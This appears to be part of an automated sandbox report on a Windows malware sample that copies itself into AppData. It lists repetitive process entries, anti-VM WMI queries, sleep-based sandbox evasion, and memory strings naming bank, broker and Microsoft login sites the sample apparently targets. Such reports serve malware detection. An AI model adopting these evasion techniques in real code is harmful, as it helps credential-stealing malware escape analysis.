Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTR
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: 29A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: 49A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: 6130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: 7130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: 7280000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: 8280000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: 14D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: 2FF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Memory allocated: 4FF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory allocated: 2530000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory allocated: 2710000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory allocated: 4710000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory allocated: 5ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory allocated: 6ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory allocated: 7020000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory allocated: 8020000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory allocated: 2FC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory allocated: 3220000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Memory allocated: 3020000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5321 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 356 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5415 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 520 Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Window / User API: threadDelayed 3103 Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Window / User API: threadDelayed 3330 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Window / User API: threadDelayed 1252
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Window / User API: threadDelayed 7809
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe TID: 6404 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4672 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7100 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5356 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe TID: 3680 Thread sleep time: -23980767295822402s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe TID: 4460 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe TID: 768 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe TID: 5736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe TID: 6404 Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe TID: 2804 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe TID: 2276 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Thread delayed: delay time: 922337203685477
Source: tmp4AF1.tmp.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp4AF1.tmp.14.dr Binary or memory string: discord.comVMware20,11696428655f
Source: tmp4AF1.tmp.14.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp4AF1.tmp.14.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp4AF1.tmp.14.dr Binary or memory string: global block list test formVMware20,11696428655
Source: tmp4AF1.tmp.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tmp4AF1.tmp.14.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp4AF1.tmp.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmp4AF1.tmp.14.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmp4AF1.tmp.14.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: l2rMtmFkD6.exe, 00000000.00000002.2103869192.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fcQyhGFSIO
Source: tmp4AF1.tmp.14.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp4AF1.tmp.14.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmp4AF1.tmp.14.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp4AF1.tmp.14.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp4AF1.tmp.14.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: tmp4AF1.tmp.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp4AF1.tmp.14.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: l2rMtmFkD6.exe, 00000008.00000002.2206765111.000000000158C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo
Source: tmp4AF1.tmp.14.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp4AF1.tmp.14.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
